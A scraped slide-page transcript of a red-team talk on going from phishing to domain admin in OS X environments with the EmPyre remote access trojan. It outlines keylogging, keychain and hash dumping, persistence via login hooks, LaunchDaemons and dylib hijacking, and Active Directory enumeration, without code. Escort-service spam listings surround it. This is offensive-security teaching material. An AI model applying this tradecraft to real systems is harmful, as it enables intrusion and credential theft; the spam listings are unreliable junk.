VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...SUHANI PANDEY
 
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...Escorts Call Girls
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge GraphsEleniIlkou
 
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.soniya singh
 
💚😋 Bilaspur Escort Service Call Girls, 9352852248 ₹5000 To 25K With AC💚😋
💚😋 Bilaspur Escort Service Call Girls, 9352852248 ₹5000 To 25K With AC💚😋💚😋 Bilaspur Escort Service Call Girls, 9352852248 ₹5000 To 25K With AC💚😋
💚😋 Bilaspur Escort Service Call Girls, 9352852248 ₹5000 To 25K With AC💚😋nirzagarg
 
( Pune ) VIP Pimpri Chinchwad Call Girls 🎗️ 9352988975 Sizzling | Escorts | G...
( Pune ) VIP Pimpri Chinchwad Call Girls 🎗️ 9352988975 Sizzling | Escorts | G...( Pune ) VIP Pimpri Chinchwad Call Girls 🎗️ 9352988975 Sizzling | Escorts | G...
( Pune ) VIP Pimpri Chinchwad Call Girls 🎗️ 9352988975 Sizzling | Escorts | G...nilamkumrai
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...SUHANI PANDEY
 

Recently uploaded (20)

APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
 
📱Dehradun Call Girls Service 📱☎️ +91'905,3900,678 ☎️📱 Call Girls In Dehradun 📱
📱Dehradun Call Girls Service 📱☎️ +91'905,3900,678 ☎️📱 Call Girls In Dehradun 📱📱Dehradun Call Girls Service 📱☎️ +91'905,3900,678 ☎️📱 Call Girls In Dehradun 📱
📱Dehradun Call Girls Service 📱☎️ +91'905,3900,678 ☎️📱 Call Girls In Dehradun 📱
 
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
 
( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...
( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...
( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...
 
Yerawada ] Independent Escorts in Pune - Book 8005736733 Call Girls Available...
Yerawada ] Independent Escorts in Pune - Book 8005736733 Call Girls Available...Yerawada ] Independent Escorts in Pune - Book 8005736733 Call Girls Available...
Yerawada ] Independent Escorts in Pune - Book 8005736733 Call Girls Available...
 
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
 
20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
 
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
 
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
 
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
 
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
 
💚😋 Bilaspur Escort Service Call Girls, 9352852248 ₹5000 To 25K With AC💚😋
💚😋 Bilaspur Escort Service Call Girls, 9352852248 ₹5000 To 25K With AC💚😋💚😋 Bilaspur Escort Service Call Girls, 9352852248 ₹5000 To 25K With AC💚😋
💚😋 Bilaspur Escort Service Call Girls, 9352852248 ₹5000 To 25K With AC💚😋
 
( Pune ) VIP Pimpri Chinchwad Call Girls 🎗️ 9352988975 Sizzling | Escorts | G...
( Pune ) VIP Pimpri Chinchwad Call Girls 🎗️ 9352988975 Sizzling | Escorts | G...( Pune ) VIP Pimpri Chinchwad Call Girls 🎗️ 9352988975 Sizzling | Escorts | G...
( Pune ) VIP Pimpri Chinchwad Call Girls 🎗️ 9352988975 Sizzling | Escorts | G...
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
 

External to DA, the OS X Way

  • 1. External to DA, the OS X Way Operating in an OS X-heavy environment
  • 2. Contents  Introduction  Overview  Tradecraft Preparation  Challenges  The Agent  Phishing  Situational Awareness: Host Enumeration  Privilege Escalation  Persistence  Situational Awareness: Network and User Enumeration  Lateral Movement
  • 3. Introductions  Alex Rymdeko-Harvey is a previous US Army Solider that recently transitioned and currently works at the Adaptive Threat Division at Veris Group as a Penetration Tester and Red Teamer. Alex has a wide range of skills and experience from offensive and defensive operations taking place in today's security surface.  Steve Borosh is a long-time security enthusiast. Prior: U.S. Army Infantry Combat Veteran and private security contractor. Currently working as a Penetration Tester, Red Teamer and Instructor with Veris Group’s Adaptive Threat Division. Steve enjoys bug hunting, building useful security tools and teaching.
  • 4. Overview • Typical penetration tests cover Windows / Linux • Assessments become mundane • Client approaches with a large OS X user-base • Use common methodologies with new tools and techniques adapted for OS X • Utilize EmPyre, a Remote Access Trojan based of of the Empire framework
  • 5. Adversarial Use • WireLurker (Trojanized applications, Infects connected ios devices) • XcodeGhost (Infected xcode package in China) • Hacking Team (Remote Code Systems compromise platform) • OceanLotus (Flash Dropper, Download Mach-O binary) • KeRanger (Ransomware, Infected transmission package)
  • 6. The Scenario • A client requests an external penetration test against their corporate infrastructure. • Phishing with payloads may be conducted with email addresses harvested from publicly available sources. • 90% of users utilize OS X with several developers using Windows
  • 7. Scenario: Goals • Phish OS X users • Elevate local privileges • Move Laterally if needed • Gain control of the Active Directory domain
  • 8. Tradecraft Preparation • Planning and Preparation • Right tools for the job • Live off the land • pbpaste • screencapture • Native vs Non-Native • Methodology • Reconnaissance • Exploitation (gain access) • Sitiuational Awareness • Escalate Privileges • Establish Persistence • Lateral Movement Gain Access Situational Awareness Escalate Privileges Establish Persistence Lateral Movement
  • 9. Challenges  Limited information on operating in OS X environments  No open-sourced asynchronous Remote Access Trojan (RAT)  Lateral Spread  OS X/Linux  Windows  Less phishing payloads available  No OLE  Less executable types
  • 11. The Agent: EmPyre  Remote Access Trojan (RAT)  Python (core developed by @harmj0y) based on the Empire project  Asynchronous / C2  Secure Diffie-Hellman exchange communications  Post-Exploitation modules  OS X/Linux  Launcher detects Little Snitch
  • 12. The Agent: EmPyre  The Diffie Hellman implementation is from Mark Loiseau's project at https://github.com/lowazo/pyDHE, licensed under version 3.0 of the GNU General Public License.  The AES implementation is adapted from Richard Moore's project at https://github.com/ricmoo/pyaes, licensed under the MIT license.
  • 13. Phishing  Previous Tradecraft  Browser Exploits  Java Payloads  OLE Documents  Macro Payloads
  • 14. Phishing: Payload Generation  2015-7007 HTML Applescript launcher  OS X Microsoft Office Macro  Supports 2011  2016 = “Sandbox”
  • 16. Situational Awareness: Host  Previous Tradecraft  PowerShell  WMI  PowerUp  Cobalt Strike Beacon modules  Meterpreter modules  The core of knowing your land  How do we priv-esc?
  • 17. Situational Awareness: Host  Keylog  Keychain Dump  Clipboard Monitoring  Scrape Messages  Hash Dump  Browser Dump
  • 18. Situational Awareness: Keylogging  Elevated Context  Vital portion of our tradecraft  post exploitation
  • 19. Situational Awareness: Clipboard Monitoring  Non-Native method  Native pbpaste may be signatured by Carbon Black  Out to file
  • 20. Situational Awareness: Keychain Dump  Cleartext Keychain Dump  Versions Prior to OS X El Capitan Inspired / Adapted from Juuso: https://github.com/juuso /keychaindump
  • 21. Situational Awareness: Search Messages  Scrapes Message.app DB  iMessage, Jabber, Google Talk, Yahoo, AIM  Enumerate X messages  Account  Service  Number  message
  • 22. Situational Awareness: Hashdump  Local Hashes  Hashcat format ready!
  • 23. Situational Awareness: Browser Dump  Dump Chrome  Dump Safari  Specify length of output
  • 25. Persistence  Previous Tradecraft  Windows  Registry  Startup Folders  WMI  DLL Hijack  Net user /add  Linux  Crontab  adduser
  • 26. Persistence  Login Hooks  Login persistence  Crontab  Hourly persistence  LaunchDaemon  Reboot persistence  DyLib Hijacking  Application start persistence
  • 27. Persistence: Login Hook - User Context Persistence  Mac Login Hooks  Bash / Applescript execution  Accessible to all users  Uses “Defaults” tool  Sets com.apple.loginwindow LoginHook
  • 28. Persistence: Crontab  Set persistence by time  Requires file on disk
  • 29. Persistence: Launch Daemon  Requires Sudo  Spawns on reboot  Spawns on agent loss
  • 30. Persistence: Dylib Hijacking  Hijack Scanner Module  Based on @patrickwardle research
  • 32. Situational Awareness: Network  Previous Tradecraft  Arp  Nmap  Net Commands  EyeWitness  PowerView
  • 33. Situational Awareness: Network  Group Policy Preferences  Active Directory Queries  Port Scanning  Web Discovery
  • 34. Situational Awareness: Active Directory Modules  situational_awareness/network/active_directory/get_computers  situational_awareness/network/active_directory/get_domaincontrollers  situational_awareness/network/active_directory/get_fileservers  situational_awareness/network/active_directory/get_groupmembers  situational_awareness/network/active_directory/get_groupmemberships  situational_awareness/network/active_directory/get_groups  situational_awareness/network/active_directory/get_ous  situational_awareness/network/active_directory/get_userinformation  situational_awareness/network/active_directory/get_users
  • 35. Situational Awareness: GPP  Group Policy Preferences  Pulls “Encrypted” passwords from SYSVOL  MS14-025 https://raw.githubusercontent.com/leonteale/pentestpackage/master/Gpprefdecrypt.py
  • 36. Situational Awareness: Finding the Domain Controller
  • 37. Situational Awareness: LDAP Queries  Utilizes LDAP queries to pull objects such as computers, users, groups and more from Active Directory.
  • 38. Situational Awareness: Web Services  find_fruit module  Checks for possible vulnerable web applications  Tomcat  jboss  idrac  Apache Axis2  etc..
  • 39. Lateral Movement  Previous Tradecraft  Linux  SSH  Telnet  Exploitation  Windows  PSEXEC  WMI  Exploitation  RDP
  • 40. Lateral Movement  Windows  Pivot to “Empire”  Exploit Web Services
  • 41. Lateral Movement  Linux/OS X  SSH Commands  SSH Launcher
  • 42.
  • 43. Honorable Mention: REST API  EmPyre implements the same RESTful API specification as Empire  https://github.com/PowerShellEmpire/Empire/wiki/RESTful-API  External users/projects can fully control an EmPyre server in a predictable way REST requests  This opens the possibility for web front ends, Android apps, multi- player CLI UIs, and more
  • 44. What’s next  Socks Proxy  Community Modules  More Exploitation Modules  Merge with Empire Thanks to @harmj0y, @xorrior, @CptJesus for their contributions to this effort!

Editor's Notes

  1. Steve starts talking
  2. Introduce ourselves
  3. As a Penetration Tester or Red Teamer, the path to Domain Administrator in many environments may seem all too easy or “cookie cutter” these days. But what happens when you engage a high-security client with an OS X-heavy environment? Do you turn down the engagement or accept the challenge and up your game? This talk explores such a scenario and how testers can utilize various tools, techniques, and lessons-learned to successfully perform a complete assessment in an OS X domain-joined environment. We will cover a custom-built OS X/Linux agent and its associated tradecraft, from gaining initial access, to post-exploitation, lateral spread, persistence, and domain compromise.
  4. Keep in mind, methodologies stay the same for OS X, tradecraft may change. Explain such as “How do we gain access in OS X”? SSH/Phishing.
  5. Different operating systems present their own lateral spread challenges. (linux: no smb, wmi, powershell) (Windows: no ssh, OS X doesnt have net commands)
  6. Alex Start Familiar interface for Empire users.
  7. Currently ,we have two payloads for phishing.
  8. Talk about tradecraft as a whole, This is post exploitation enumeration
  9. Keychain Dump - No el Capitan YET
  10. Currently saves to target in an unencrypted format.
  11. Talk about how messages are stored unencrypted in a database
  12. Currently, only dumps history. Useful for hunting internal web services.
  13. Steve Starts
  14. Utilizes “ldapsearch” for AD enumeration
  15. In order to perform LDAP queries we’ll need to start off by finding the domain controller that we are going to bind our LDAP queries to. One quick solution is a single nslookup query.
  16. During most penetration tests, you may find yourself moving from host to host using common techniques such as PSEXEC, WMI or RDP. Operating in an OS X environment presents challenges as these methods may not be available.